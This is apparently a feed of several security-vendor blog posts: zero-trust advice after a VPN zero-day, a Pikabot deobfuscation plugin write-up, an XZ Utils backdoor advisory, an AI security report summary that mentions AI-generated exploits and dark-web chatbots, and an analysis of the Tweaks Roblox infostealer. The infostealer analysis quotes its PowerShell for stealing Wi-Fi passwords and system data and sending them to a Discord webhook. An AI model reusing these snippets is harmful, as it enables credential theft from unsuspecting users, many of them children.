VPNs, which are among the primary vectors used to breach organizations and steal their data. Moreover, it is not only these initial assets that expose enterprises to enormous risk — it is also the underlying network architecture, which allows attackers, once they have compromised these initial assets, to move laterally, find enterprises’ most critical applications and data stores, and steal their data. Reconnaissance. Attackers scan for critical vulnerabilities in the external enterprise attack surface, including zero-day vulnerabilities in VPNs and firewalls. Initial compromise. Threat actors exploit these VPN and firewall vulnerabilities to gain initial access to enterprises devices and the network. Move laterally. Attackers establish persistence and move laterally across the network, scanning for high-value assets, stealing other credentials, and compromising additional systems. Steal data. Once threat actors have compromised your critical assets and data, they will work to exfiltrate it from the network. In the case of ransomware, attackers may additionally deploy ransomware, often leveraging a domain controller, to bring down the victim’s environment. Figure 3. The four-stage attack sequence. How can enterprises reduce the impact of zero-day attacks? While it will always be essential for enterprises to patch critical vulnerabilities, the only meaningful way to stay ahead of these types of zero-day attacks is for organizations to adopt a zero trust architecture. Avoid them altogether, from a first principles perspective. Here are some fundamental zero trust principles that organizations can adopt to mitigate the risks of exposed assets like VPNs, firewalls, and more. Eliminate Your Attack Surface: Implement Zero Trust. While the term ‘zero trust’ is heavily used (and abused), it’s for good reason: zero trust principles, and their accompanying architecture, represent the only way enterprises can overcome the risks associated with legacy networks, including vulnerabilities in firewalls and VPNs. These principles are not merely buzzwords applied to legacy products (virtualized VPNs and Firewalls are not zero trust) — they are goals that require technological transformation and a cloud-first approach to accomplish. Per the NSA Zero Trust Security Model, there are three fundamental principles enterprises should adopt. Never trust, always verify. Enterprises should treat every user, device, application, workload, or data flow as untrusted. Moreover, enterprises should never connect users to the underlying network, but directly to applications using a cloud-proxy architecture. Assume a breach has happened. Particularly given the recent pace of zero day vulnerability disclosures, enterprises should operate with an assumption that threat actors have already gained persistence in their environment and defend their crown jewel applications — where their most critical data is stored — accordingly. Verify Explicitly with least privilege access. Enterprises should allow trust only after seven layers of zero trust security, identity, and contextual attributes have been established. Figure 4. Seven layers of security enabled with a Zero Trust architecture (in this case the Zscaler Zero Trust Exchange). In practice, a zero trust architecture is fundamentally different from those built on firewalls and VPNs. Compared to traditional, perimeter-based networking approaches, which place users on the enterprise network, a zero trust architecture enables one-to-one connectivity between requesters and resources. This could include, for instance, users connecting to applications, but it could also enable connectivity between workloads, branch locations, remote users and operational technology (OT) systems, and much more. A cloud native, proxy-based zero trust architecture like the Zscaler Zero Trust Exchange: Minimizes the attack surface by eliminating firewalls, VPNs, and public-facing IP addresses, allowing no inbound connections, and hiding apps behind a zero trust cloud. Stops compromise by leveraging the power of the cloud to inspect all traffic, including encrypted traffic at scale, in order to enforce policies and stop threats in real-time. Eliminates lateral threat movement by connecting entities to individual IT resources instead of extending access to the entire network. Blocks data loss by enforcing policies across all potential leakage paths (including encrypted traffic), protecting data in motion, data at rest, and data in use. Best practices for enterprisesIn light of these recent zero-day vulnerabilities, it is imperative that enterprises employ the following best practices to fortify their organization against potential exploits: Minimize the attack surface: make apps (and vulnerable VPNs) invisible to the internet, and impossible to compromise, ensuring an attacker can’t gain initial access. Prevent initial compromise: inspect all traffic in-line to automatically stop zero-day exploits, malware, or other sophisticated threats. Enforce least-privileged access: restrict permissions for users, traffic, systems, and applications using identity and context, ensuring only authorized users can access named resources. Block unauthorized access: use strong multi-factor authentication (MFA) to validate user access requests. Eliminate lateral movement: connect users directly to apps, not the network, to limit the blast radius of a potential incident. Shutdown compromised users and insider threats: enable inline inspection and monitoring to detect compromised users with access to your network, private applications, and data. Stop data loss: inspect data in motion and data at rest to stop active data theft during an attack. Deploy active defenses: leverage deception technology with decoys and perform daily threat hunting to derail and capture attacks in real time. Test your security posture: get regular third-party risk assessments and conduct purple team activities to identify and harden the gaps in your security program. Request that your service providers and technology partners do the same and share the results of these reports with your security team. ConclusionToday’s zero-day vulnerability impacting Palo Alto Network’s GlobalProtect Gateway product represents yet another unfortunate milestone in a clear enterprise trend: traditional, perimeter-based approaches to security and networking face systemic, not temporary, security weaknesses that cannot be waved away with any single security patch. Of course, no vendor can be immune from software defects and vulnerabilities. However, given the back-to-back CVEs impacting firewalls, VPNs, supply chain tools, and more, it should be clear to security leaders and practitioners that zero trust security is crucial. Adopting a cloud-delivered zero trust architecture removes the attack surface created by legacy technology. Denying attackers their traditional beachheads — the vulnerabilities in VPNs, firewalls, and the like — is key for creating a more robust and secure environment. References If you are concerned about these vulnerabilities, please contact Zscaler at [email protected] for a free external attack surface assessment as well as professional consultation on how you can migrate from legacy architectures to Zero Trust. Acknowledgement for analysis: Atinderpal Singh, Will Seaton Fri, 12 abr 2024 22:23:31 -0700 Deepen Desai Automating Pikabot’s String Deobfuscation IntroductionPikabot is a malware loader that originally emerged in early 2023 with one of the prominent features being the code obfuscation that it leverages to evade detection and thwart technical analysis. Pikabot employed the obfuscation method to encrypt binary strings, including the address of the command-and-control (C2) servers. In this article, we briefly describe the obfuscation method used by Pikabot and we present an IDA plugin (with source code) that we developed to assist in our binary analysis. As mentioned in our previous article, the obfuscation method was removed when Pikabot remerged with a new version in early 2024. As of April 2024, this obfuscation method has not been used again in any Pikabot samples. Key Takeaways Pikabot is a malware loader that was first observed in early 2023 and became very active following the takedown of Qakbot in August 2023. Previous versions of Pikabot used advanced string encryption techniques, which have been replaced with simpler algorithms. Previously, the strings were encrypted using a combination of AES-CBC and RC4 algorithms. The string obfuscation’s implementation is similar to ADVobfuscator. In this article, we describe the binary strings’ obfuscation algorithm and our approach to decrypt the binary strings using IDA’s microcode. Zscaler ThreatLabz developed an IDA plugin to automatically decrypt Pikabot’s obfuscated strings and are releasing the source code. Technical AnalysisStrings obfuscationThe steps for decrypting a Pikabot string are relatively simple. Each string is decrypted only when required (in other words, Pikabot does not decrypt all strings at once). Pikabot follows the steps below to decrypt a string: Pushes on the stack the encrypted string array. Initializes the RC4 encryption algorithm. The RC4 key is different for each string (with very few exceptions). Pikabot takes the decrypted RC4 output, decodes it using Base64 after replacing all instances of the character ‘_’ (underscore) with ‘=’ (equal) and decrypts it using the AES-CBC algorithm. The AES key and initialization vector (IV) are the same for all strings. ANALYST NOTE: There are encrypted strings, which are encrypted only with the RC4 algorithm. Figure 1 shows the code used to decrypt the string, Kernel32.dll. Figure 1: Example Pikabot string decryption for Kernel32.dll.Figure 2 shows the function that first decrypts the AES key and IV. The RC4 decrypted string passed to the function is then Base64 decoded, and is finally decrypted using AES. Figure 2: Pikabot Base64 decoding and AES decryption function. Decrypting Pikabot stringsThe following information is required to decrypt a Pikabot string: The AES key and IV of a binary sample. The RC4 encrypted array of each string. The RC4 key of each encrypted string. The string’s size. Our approach relies on IDA’s microcode. This decision helped us with several problems such as: IDA’s microcode converts the assignment/copy of the RC4 key into a strcpy function. In the assembly level, this could either be multiple mov or rep instructions. As a result, it would make the detection and extraction harder and more challenging. Extracting the RC4 encrypted array. Since IDA reconstructs the stack, it makes it much easier to search and extract the encrypted array. IDA’s microcode brings other limitations (for example, decompilation failure for a function) but no such issues were encountered for the parts of the code we wanted to analyze. In the sections below, we describe how each component was extracted. Extracting the AES key/IVFor the extraction of the AES key and IV, we iterate all analyzed functions and discard any function, whose size is not in the range of 600 and 1,600 bytes. Next, we scan the functions for the following patterns: Existence of RC4 encryption. This is the same heuristic we use for detecting encrypted RC4 strings. Existence of values 0x3D and 0x5F (used before Base64 decoding the string) that are used with microcode opcodes m_stx and m_jnz respectively. Lastly, if all of the patterns above match, then the handler for decrypting a Pikabot string is invoked. For the classification of the key and the IV, we apply the following checks: The number of decrypted strings from the identified function must be two. Otherwise, the identified function is incorrect. The longest string is marked as the AES key (by taking the first 32-bytes) and the remaining decrypted string as the IV (by taking the first 16-bytes). Extracting the RC4 encrypted arrayPikabot constructs the RC4 encrypted array by pushing it onto the stack and then decrypting it. Our approach involves the following steps for detecting each part of the array: Use the detected RC4 encryption block address as a starting point. Search for the microcode opcode m_add in the decryption instruction. The detected microcode holds the starting stack offset of the encrypted array. Start iterating backwards and search for the microcode opcodes m_mov/m_call, the second opcode is used in case the data is copied via a strcpy or memcpy instruction. If the stack offset matches, then we save the data and update the stack offset. This process is repeated until the reconstructed encrypted array has the expected size. Extracting the RC4 encrypted array sizeThe length of the encrypted array is extracted in a similar way as the encrypted array. The detection pattern is: Use the detected RC4 encryption block address as a starting point. Search for the microcode opcodes m_jb, m_jae, and m_setb, and use the immediate constant number in the instruction as a size. Extracting the RC4 keyExtracting the RC4 key of each string proved to be the most challenging part while creating the plugin. In our first attempt, we were extracting the RC4 key after detecting the initialization of the RC4 algorithm. However, this approach had the following issues: Incorrect extraction of the RC4 key: In many cases, an invalid/junk string was placed in-between the correct RC4 key and the RC4 algorithm initialization. Incorrect detection of RC4 initialization code block: For example, if the size of the encrypted array was 256 bytes then an incorrect RC4 key would be detected. Instead of trying to detect the RC4 key by detecting the initialization of the RC4 algorithm, we decided to extract all strings from each targeted function. Then, we decrypted the RC4 encrypted array with each extracted RC4 key and validated the decrypted output by applying the following checks: If it matches the expected string size. If all characters of the string are readable. ANALYST NOTE: After successful decryption, the RC4 key is marked and not reused in order to limit any false-positives. For example, if the decrypted string does not have any junk characters. IDA PluginWe tested our Pikabot plugin with IDA versions 8 and newer. The plugin can be executed by compiling the source code using IDA's SDK and/or copying the generated DLL into the IDA plugins folder. After a Pikabot sample is loaded, the user can decompile a function and right-click in the decompiled output and either choose to decrypt strings in the current function or in all of them (Figure 3). Figure 3: IDA Pikabot plugin options. For each decrypted string, the plugin sets a comment in the decompiled output. Figure 4 shows a function with the obfuscated strings before the plugin is invoked. Figure 4: Before running the Pikabot string decryption plugin. Figure 5 shows the output after our Pikabot IDA plugin is executed. Figure 5: Output after running the Pikabot string decryption plugin. Source CodeThe source code for our IDA plugin to deobfuscate Pikabot strings can be found at this GitHub repository. ConclusionOlder Pikabot variants include a string obfuscation implementation, which can make automation a complicated task. By using IDA’s microcode and developing our own plugin, we were able to speed up our analysis in most cases and analyze the code much faster. Since this technique is no longer used by Pikabot, we decided to open source our IDA plugin to assist the research community with defeating current and future stack-based obfuscation techniques. Zscaler CoverageIn addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to Pikabot at various levels with the following threat names: Win32.Trojan.PikaBot Win32.Downloader.PikaBot Indicators Of Compromise (IOCs)The following samples were used for testing the plugin. SHA256DESCRIPTIONaebff5134e07a1586b911271a49702c8623b8ac8da2c135d4d3b0145a826f507Pikabot Sample4c53383c1088c069573f918c0f99fe30fa2dc9e28e800d33c4d212a5e4d36839Pikabot Sample15e4de42f49ea4041e4063b991ddfc6523184310f03e645c17710b370ee75347Pikabot Samplee97fd71f076a7724e665873752c68d7a12b1b0c796bc7b9d9924ec3d49561272Pikabot Samplea9f0c978cc851959773b90d90921527dbf48977b9354b8baf024d16fc72eae01Pikabot Sample1c125a10c33d862e6179b6827131e1aac587d23f1b7be0dbcb32571d70e34de4Pikabot Sample62f2adbc73cbdde282ae3749aa63c2bc9c5ded8888f23160801db2db851cde8fPikabot Sampleb178620d56a927672654ce2df9ec82522a2eeb81dd3cde7e1003123e794b7116Pikabot Sample72f1a5476a845ea02344c9b7edecfe399f64b52409229edaf856fcb9535e3242Pikabot SampleAcknowledgmentsThe following projects were the initial inspiration for developing our plugin. In addition, they assisted with the usage of IDA’s SDK: HexRaysDeob - by Rolf Rolles Goomba - by Hex-Rays Mon, 08 abr 2024 08:31:02 -0700 Nikolaos Pantazopoulos CVE Advisory: CVE-2024-3094 - Security Compromise in XZ Utils IntroductionOn March 29th, a security incident surfaced involving XZ Utils, a widely utilized data compression package integrated into major Linux distributions. Malicious code, allowing unauthorized remote SSH access, was discovered within versions 5.6.0 and 5.6.1 of XZ Utils. This exploit has been formally identified as CVE-2024-3094 and assigned a critical CVSS score of 10. BackgroundXZ Utils fell victim to a sophisticated supply chain attack where attackers targeted the liblzma library, a crucial dependency utilized by OpenSSH. This attack allowed for the injection of code into an OpenSSH server, resulting in the potential for remote code execution (RCE). The liblzma build process employs a series of intricate obfuscations to extract a prebuilt object file from a disguised test file within the source code. This object file is then utilized to modify specific functions within the liblzma library. Any software utilizing this modified version of the liblzma library is susceptible to data interception, modification, and breaches. The malicious code was promptly discovered, and infected only the two most recent versions of the package, 5.6.0 and 5.6.1, both of which were released within the last month. Affected VersionsThe following table describes impacted distributions, along with a corresponding recommendation for each distribution. DistributionAffected SystemsAffected PackagesRecommendationAlpine LinuxEdge (active development) xz 5.6.1-r0 xz 5.6.1-r1 Upgrade immediately to the latest version, 5.6.1-r2.Arch LinuxN/A5.6.0-1, 5.6.1-1, and/or any release item that matches the following criteria: Installation medium 2024.03.01 Virtual machine images 20240301.218094 and 20240315.221711 Container images created between and including 2024-02-24 and 2024-03-28 Upgrade immediately to the latest version, 5.6.1-2.DebianDebianUnstable (aka “Sid”) *This is a testing, unstable, & experimental version. xz-utils 5.5.1alpha-0.1(uploaded on 2024-02-01), up to and including 5.6.1-1.Revert to 5.4.5 or upgrade to 5.6.1+really5.4.5-1. Note: No stable Debian versions are known to be impacted. Any compromised packages were part of Debian testing. KaliN/Axz-utils 5.6.0-0.2 and/or any Kali installation updates made between March 26th and March 29th.Apply the latest updates if you updated between March 26th and March 29th.openSUSE MicroOS Tumbleweed 5.6.0, and/or any updates that occurred between March 7th and March 28th.Revert to 5.4.x. Note: For Tumbleweed users, you also have the option to upgrade to a new Tumbleweed snapshot (20240328 or later) containing the reversed version 5.6.1.revertto5.4 Red Hat Fedora 40*, 41 Fedora Rawhide *Updated March 30, 2024: Fedora 40 beta does contain two affected versions of xz libraries - xz-libs-5.6.0-1.fc40.x86_64.rpm and xz-libs-5.6.0-2.fc40.x86_64.rpm. At this time, Fedora 40 does not appear to be affected by the actual malware exploit, but all Fedora 40 beta users are encouraged to revert to 5.4.x versions. xz-5.6.0 xz-5.6.1 Revert to 5.4.x. Note: RedHat has advised users to immediately stop any instances of Fedora 41 or Fedora Rawhide, until XZ packages are reverted to safe versions. Red Hat Enterprise Linux (RHEL) was not impacted by this vulnerability. Table 1: A table listing impacted distributions, operating systems, and packages, along with recommendations to address the vulnerability. Technical DetailsThe goal of the malicious backdoor implementing CVE-2024-3094 is to inject code into an OpenSSH server (SSHD) running on the victim's machine and allow remote attackers (who possess a certain private key) to send an arbitrary payload via SSH, which is executed before the authentication step and executes commands on the victim’s machine. This supply chain attack uses multiple stages to decrypt obfuscated payloads and modify the build process of the XZ Utils tools. The obfuscated/encrypted stages and later binary backdoor are hidden in these two test files: tests/files/bad-3-corrupt_lzma2.xz tests/files/good-large_compressed.lzma The figure below depicts the attack sequence an attacker could exploit. Figure 1: A diagram of the attack flow. The build process uses the following command to ensure that the victim’s system is running on Linux and possesses a x86_64 architecture: if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1); thenIn addition, the build process checks whether the .rpm package is Debian or Red Hat-based. It also inspects certain environmental variables such as TERM and LANG. The TERM variable is set after SSH client and server authentication. The malicious payload verifies that the TERM variable is not set and that the LANG variable is set, and ensures that the running binary is /usr/sbin/sshd as it won’t be relevant with other binaries. After deciphering and decompressing the malicious payload over multiple stages, the payload is injected into liblzma. The payload modifies the behavior of the RSA_public_decrypt function, which is used in verification of signatures. The payload decrypts the RSA public modulus N value from the attacker’s request and decrypts it using the ChaCha20 symmetric stream cipher. The validation of the decrypted data is done using the Ed448 elliptic curve signing algorithm. Then, the decrypted payload is executed on the user’s SSH server. The backdoor contains only the public key, which ensures that only the attackers can generate valid payloads for the backdoor. The signature is bound to the host’s public key, meaning that a valid signature for one host cannot be reused for a different host. RecommendationsIn response to this threat, the Cybersecurity and Infrastructure Security Agency (CISA) has issued directives for affected individuals and organizations. XZ Utils developers and users are strongly advised to downgrade to a trusted, unaffected version of XZ Utils predating 5.6.0, such as 5.4.6 stable, or upgrade to a newer fixed version, if available. Additionally, thorough audits of system logs and network traffic are encouraged to identify any signs of suspicious activity. Any findings should be promptly reported to CISA for further investigation. How To Detect CVE-2024-3094To check if your version of XZ Utils is impacted (5.6.0 or 5.6.1) run the following command: $(which xz) --version | grep '5\.6\.[01]' Zscaler CoverageThe Zscaler ThreatLabz team has deployed protection.Zscaler Advanced Threat Protection: Linux.Exploit.CVE-2024-3094 Zscaler continues to monitor activities, through our telemetry data, potentially exploiting this vulnerability. References Mon, 01 abr 2024 17:23:11 -0700 Varun Sandila New AI Insights: Explore Key AI Trends and Risks in the ThreatLabz 2024 AI Security Report Today, Zscaler ThreatLabz released its inaugural ThreatLabz 2024 AI Security Report. This report comes at a key inflection point: as AI tools and language models (LLMs) like ChatGPT weave their way into the fabric of enterprise life, questions around how to securely enable these AI tools and protect enterprise data remain unanswered. Complicating matters, AI is also driving a new generation of cyber threats, enabling adversaries to launch attacks at greater speed, sophistication, and scale. As a result, enterprises must take the right steps to both securely enable AI productivity tools within the business and leverage AI to defend against a new landscape of AI-driven threats. The Zscaler ThreatLabz 2024 AI Security report draws on more than 18 billion transactions in the Zscaler Zero Trust Exchange™, from April 2023 to January 2024. The report uncovers key trends, risks, and best practices in the ways that enterprises are adopting — and blocking — AI applications across industry verticals and around the world. Meanwhile, ThreatLabz also offers insight into the evolving AI threat landscape and real-world AI threat scenarios, before providing key security best practices for defending against them (including with AI). Download the Zscaler Zscaler ThreatLabz 2024 AI Security Report to uncover data-driven AI insights and enterprise best practices for securing AI. Key ThreatLabz AI FindingsExplosive AI growth: Enterprise AI/ML transactions surged by 595% between April 2023 and January 2024. Concurrent rise in blocked AI traffic: Even as enterprise AI usage accelerates, enterprises block 18.5% of all AI transactions, a 577% increase signaling rising security concerns. Primary industries driving AI traffic: manufacturing accounts for 21% of all AI transactions in the Zscaler security cloud, followed by Finance and Insurance (20%) and Services (17%). Clear AI leaders: the most popular AI/ML applications for enterprises by transaction volume are ChatGPT, Drift, OpenAI, Writer, and LivePerson. Global AI adoption: the top five countries generating the most enterprise AI transactions are the US, India, the UK, Australia, and Japan. A new AI threat landscape: AI is empowering threat actors in unprecedented ways, including for AI-driven phishing campaigns, deepfakes and social engineering attacks, polymorphic ransomware, enterprise attack surface discovery, exploit generation, and more. Enterprise decision point: when to allow AI apps, when to block them, and how to mitigate ‘shadow AI’ risk One key theme in the report is that, to reap the full transformative potential of AI, enterprises must work to securely enable AI — that is, to minimize the risks associated with integrating and developing AI tools, while devising strategies to prevent or curtail an explosion of unapproved AI tools in the enterprise, a trend dubbed ‘shadow AI’. In general, enterprises can think about these risks as falling into three broad categories: Protecting sensitive data: Generative AI tools can inadvertently leak sensitive and confidential information, making data protection measures crucial. In fact, sensitive data disclosure is number six on the Open Worldwide Application Security Project (OWASP) Top Ten for AI Applications. Apart from adversarial threats like prompt injection attacks or malware, the biggest risks can stem from well-meaning users who inadvertently expose sensitive or proprietary data to large language models (LLMs). There are numerous ways that enterprise users may unknowingly do this, such as, for example, an engineer asking a gen AI tool to optimize or refactor proprietary code, or a sales team member asking an AI to use historical sales figures to forecast future pipeline. Enterprises should implement robust AI policy guidelines and technology-based data loss prevention (DLP) measures to prevent accidental data leaks and breaches. Meanwhile, they should also gain deep visibility into AI app usage to prevent or mitigate shadow AI, with granular access controls that ensure users only leverage approved AI applications. Data privacy and security risks of AI apps: Not all AI applications have the same level of data privacy and security. Terms, conditions, and policies can vary greatly, and enterprises should consider whether their data, for example, will be used to train language models, mined for advertising, or sold to third parties. Enterprises must assess and assign security risk scores to the AI applications they use, considering factors like data protection and the security practices of the companies behind them. Data quality and poisoning concerns: The quality and scale of data used to train AI applications directly impact the reliability of AI outputs. Enterprises should carefully evaluate the data quality when selecting an AI solution and establish a strong security foundation to mitigate risks like data poisoning. The new era of AI-driven threatsThe risks of AI are bi-directional: from outside enterprise walls, businesses face a continuous wave of threats that now includes AI-driven attacks. The reality is that virtually every type of existing threat can be aided by AI, which translates to attacks being launched at unprecedented speed, sophistication, and scale. Meanwhile, the future possibilities are limitless — meaning that enterprises face an unknown set of unknowns, when it comes to AI-driven cyber attacks. Still, clear attack patterns are emerging. In the 2024 AI Security Report, ThreatLabz provides insights into numerous evolving threats types, including: AI impersonation: AI deepfakes, sophisticated social engineering attacks, misinformation, and more. AI-generated phishing campaigns: end to end campaign generation, along with a ThreatLabz case study in creating a phishing login page using ChatGPT — in seven simple prompts. AI-driven malware and ransomware: how threat actors are leveraging AI automation across numerous stages of the attack chain. Using ChatGPT to generate vulnerability exploits: ThreatLabz shows how easy it is to create exploit PoCs, in this case for Log4j (CVE-2021-44228) and Apache HTTPS server path traversal (CVE-2021-41773) Dark chatbots: diving into the proliferation of dark web GPT models like FraudGPT and WormGPT that lack security guardrails. And much more… Best practices for secure AI transformation and layered AI + zero trust cyber defenseThe transformative power of AI is undeniable. To reap its enormous potential, enterprises must overcome the bi-directional set of risks that AI creates, namely: Securely enabling AI: protecting enterprise data while ushering in transformative productivity changes. Using AI to fight AI: using the power of enterprise security data to drive AI threat prevention across the attack chain, deliver real-time security insights, and fast-track zero trust. To that end, the Zscaler ThreatLabz 2024 AI Security Report offers key guidance, including: How to securely enable ChatGPT: a best practice case study for securing generative AI tools, in five steps. AI best practices and AI policy guidelines: AI frameworks and best practices that any enterprise can adopt. How Zscaler use AI to stop cyber threats: leveraging AI detections across each stage of the attack chain, with holistic visiblity into enterprise cyber risk How Zscaler enables secure AI transformation: the key capabilities that enterprises require to securely embrace genAI and ML tools, including: Full visibility into AI tool usage Granular access policy creation for AI Granular data security for AI applications Powerful controls with browser isolation Of course, AI begins and ends with the power of data. To dive deeper, download your copy of the Zscaler ThreatLabz 2024 AI Security Report or register for our live session with Zscaler CSO Deepen Desai, Navigating the AI Security Horizon: Insights from the Zscaler ThreatLabz 2024 AI Security Report. Meanwhile, if you want more information on how Zscaler is harnessing the power of AI, register for our innovation launch, The First AI Data Security Platform. Wed, 27 mar 2024 11:54:38 -0700 Will Seaton Tweaks Stealer Targets Roblox Users Through YouTube and Discord IntroductionZscaler’s ThreatLabz recently discovered a new campaign distributing an infostealer called Tweaks (aka Tweaker) that targets Roblox users. Attackers are exploiting popular platforms, like YouTube and Discord, to distribute Tweaks to Roblox users, capitalizing on the ability of legitimate platforms to evade detection by web filter block lists that typically block known malicious servers. Attackers share malicious files disguised as Frames Per Second (FPS) optimization packages with users and, in turn, users infect their own systems with Tweaks malware.Given that 45% of Roblox users are under 13, it’s probable that the malware being circulated could extend to parents’ systems. Furthermore, with the proliferation of remote work, there’s a possibility of this malware infiltrating corporate devices (surreptitiously) used by children of employees. Not only does a successful infection leave Roblox account data vulnerable, but it may also compromise the data and device.In this blog, we analyze the Tweaks attack campaign and its technical characteristics.Key TakeawaysThe Tweaks or Tweaker stealer masquerades as a tool to enhance frames per second (FPS) for Roblox users that steals data in the background without the user’s knowledge.The attackers leverage YouTube by enticing users to watch videos on "How to increase FPS" that contain links to their Discord groups. Once users join these groups, the attackers provide them with links to malicious files disguised as game tweaks and modifications.The stealer is Powershell-based and exfiltrates sensitive data like user information, location, Wi-Fi profiles, and passwords, Roblox IDs, and in-game currency details.Once sensitive data is obtained, it is sent via a Discord webhook to the attacker-controlled server. ThreatLabz researchers discovered multiple attackers copying a “free” version of Tweaks and using it to sell “paid” versions. BackgroundWhy is FPS appealing to Roblox users?The Roblox game boasts a massive user base consisting of millions of players worldwide. Roblox offers a diverse range of games and experiences, allowing players to explore virtual worlds and engage in various activities. One feature that attracts Roblox players is the desire for an enhanced gaming experience, including improved FPS. Higher FPS can result in smoother gameplay, making it an appealing prospect for players seeking optimal performance. It’s not unusual for gamers to download optimization tools from popular platforms like YouTube and Discord to increase their hardware performance – making it more likely that a gamer might unintentionally download the Tweaks malware.Gaming sees more cyber attacksRoblox's significant user base of 71.5 million daily active users makes it an attractive target for cyber attackers. In addition, a 2024 report shows that the gaming industry is now worth around $455.27 billion. In light of these trends, it is not surprising that hackers looking to exploit and monetize sensitive data are targeting Roblox users, who, like many other gamers, store a wealth of data in their gaming accountsCampaign AnalysisDuring our investigation, we discovered several YouTube channels and videos offering tutorials on how to improve FPS in Roblox. In these videos, Roblox players were instructed to disable their antivirus software to ensure the smooth operation of a “PC optimizer” without encountering any issues. In reality, this tactic is used to make a user’s system easier to infect with malware.In the description boxes of these videos, links to the attacker’s corresponding Discord groups are provided. Figure 1 below shows a Tweaks YouTube channel, the Discord group links provided to the user, and the initial Tweaks interface that appears when users download the initial file.Figure 1: An example of a Tweaks YouTube channel, links to Discord groups, and the Tweaks interface.Once they enter the attacker-controlled Discord channels, users encounter both free and paid versions of FPS optimization files. Our initial analysis revealed that both versions were identical, utilizing the same BAT file. Consequently, the choice between the free and paid versions had no impact on the outcome. The only distinction was that users who opted for the paid version experienced a small financial loss and had their data stolen.Presently, attackers entice new users by offering a free version with limited optimization features, alongside a paid version that promises more advanced optimization capabilities.Once users download the files, they unknowingly install the Tweaks malware, which not only infects their system but also puts their data at risk of being stolen. From the user's perspective, everything seems normal as the Tweaks malware genuinely enhances FPS optimization. This deceptive behavior makes users less suspicious of the malware since it appears to be fulfilling its intended purpose. Figure 2 below shows both the paid and free version of Tweaks on the Discord channel.Figure 2: An example of the Discord group advertising FPS optimization files to distribute Tweaks malware.Case Study 1After joining the Discord group, Roblox gamers are directed to download a malicious BAT file from a Mediafire link, leading to a malware infection.Once the malware is executed, the BAT file presents users with the Tweaks menu interface, while simultaneously stealing their information in the background. The stolen data is then sent via Discord webhooks to an attacker-controlled server.The figure below illustrates the Tweaks attack chain.Figure 3: Illustrates the Tweaks attack chain involving a Discord group supplying a BAT file.Case Study 2Upon further investigation, we discovered that Tweaks was being sold on Discord. Two versions are available for purchase: the Beta Menu and the Paid Menu.The malware author converted the BAT file into an EXE file and then inserted the EXE file into a password-protected ZIP archive. This new iteration employs the same stealing capabilities as the BAT file discussed in Case Study 1. The figure below illustrates the Tweaks attack chain for Case Study 2. Figure 4: This diagram illustrates the Tweaks attack chain involving a Discord group supplying an EXE file inside of a ZIP archive.CapabilitiesThe Tweaks malware can steal the following data:User’s Wi-Fi profiles and passwordsUUID and usernamesUser locationIP address and timeSystem informationRoblox ID and in-game currency informationTechnical AnalysisThe following analysis covers the technical characteristics of Case Study 1 and Case Study 2 for Tweaks.Case Study 11. BAT files establish webhooks: To start, once the user downloads the BAT file and executes it, the malware establishes the necessary webhook URLs using the Powershell commands below:"$payload = [PSCustomObject]@{ embeds = @($embedObject) };" ^ "Invoke-RestMethod -Uri $webHookUrl -Body ($payload | ConvertTo-Json -Depth 4) -Method Post -ContentType 'application/json';"The file embeds the pilfered data within the webhooks, ensuring its transmission to the attackers.2. Wi-Fi profile and password theft: The malware steals Wi-Fi profiles and passwords with the Powershell command below: “$wifiProfiles = (netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object { $_.ToString().Split(':')[1].Trim() } | ForEach-Object { $ssid = $_; $pwd = (netsh wlan show profile name=$ssid key=clear) | Select-String 'Key Content' | ForEach-Object { $_.ToString().Split(':')[1].Trim() }; if ($pwd) { Write-Output ('SSID: ' + $ssid + ', Password: ' + $pwd) } else { Write-Output 'SSID: ' + $ssid + ', Password: NO PASSWORDS FOUND' } });”The code sample above is also shown in Figure 5 below.Figure 5: Tweaks code showing the webhook setup and Wi-Fi profiles/password theft.3. Using WMI to harvest system information: The malware leverages Windows Management Instrumentation (WMI) to collect UUIDs and usernames along with the user's location including the following fields: country, region, city, and approximate location. The Powershell code looks like this:"$hwid = (Get-WmiObject win32_computersystemproduct | Select-Object -ExpandProperty UUID);" ^ "$pcUsername = $env:USERNAME;" "$ipInfo = Invoke-RestMethod -Uri '';" ^ "$country = $;" ^ "$region = $ipInfo.region;" ^ "$city = $;" ^ "$location = $ipInfo.loc;"The code sample above, along with the user’s location and username, are shown in Figure 6 below.Figure 6: Tweaks code showing the theft of UUID, user name, and the user’s location.4. Additional data theft: In addition, the malware collects IP information like private and public IP addresses, the current time, system information, Roblox ID, and currency information.The former values are collected using the following Powershell code:"$publicIp = (Invoke-RestMethod -Uri '').ip;" ^ "$privateIp = (Test-Connection -ComputerName $env:COMPUTERNAME -Count 1).IPV4Address.IPAddressToString;" ^ "$currentTime = Get-Date -Format 'yyyy-MM-dd HH:mm:ss';" ^ "$description = 'Public IP: ' + $publicIp + ' - Private IP: ' + $privateIp + ' - Current Time: ' + $currentTime;"The latter values are collected with the code shown in Figure 7 below.Figure 7: Tweaks code showing the collection of system information, Roblox ID, and in-game currency details.Case Study 2In Case Study 2, when the user follows the link mentioned in the Discord group, a ZIP archive is downloaded, which contains an EXE file. Once the user executes the EXE file, it displays the Tweaks menu interface similar to Case Study 1.The malware creates a folder in the Temp directory, C:\Users\<user_name>\AppData\Local\Temp\F9B9.tmp, with a random name and creates a BAT file in that directory as shown in the screenshot below.Figure 8: The process tree of the Tweaks EXE file.The source code of the dropped BAT file is similar to the BAT file used in Case Study 1 and its functionality is the same.ConclusionAttackers are leveraging popular community platforms, like YouTube and Discord, to distribute Tweaks malware and steal sensitive data. They capitalize on the legitimate reputation of YouTube and Discord communities to trick victims into inadvertently downloading (and in some cases paying) for their own malware infections. To mitigate these risks, Roblox users (and all gamers) should prioritize using legitimate apps from reputable and secure sources, thereby avoiding unknown or unverified application origins. By adhering to these precautions, gamers can enhance their cybersecurity defenses and protect themselves from potential malware threats.Zscaler Sandbox CoverageDuring our investigation of this campaign, the Zscaler Sandbox played a crucial role in analyzing the behavior of various files. Because of the sandbox analysis, threat scores and specific MITRE ATT&CK techniques triggered were identified. Figure 9: Sandbox reportWin32.PWS.TWEAKS BAT.PWS.TWEAKSMITRE ATT&CK TechniquesIDTechnique NameT1566PhishingT1082System Information DiscoveryT1064ScriptingT1010Application Windows DiscoveryT1047Windows Management InstrumentationT1016.002Wi-Fi DiscoveryT1016System Network Configuration DiscoveryT1059Command and Scripting InterpreterT1018Remote System DiscoveryT1562Disable or Modify 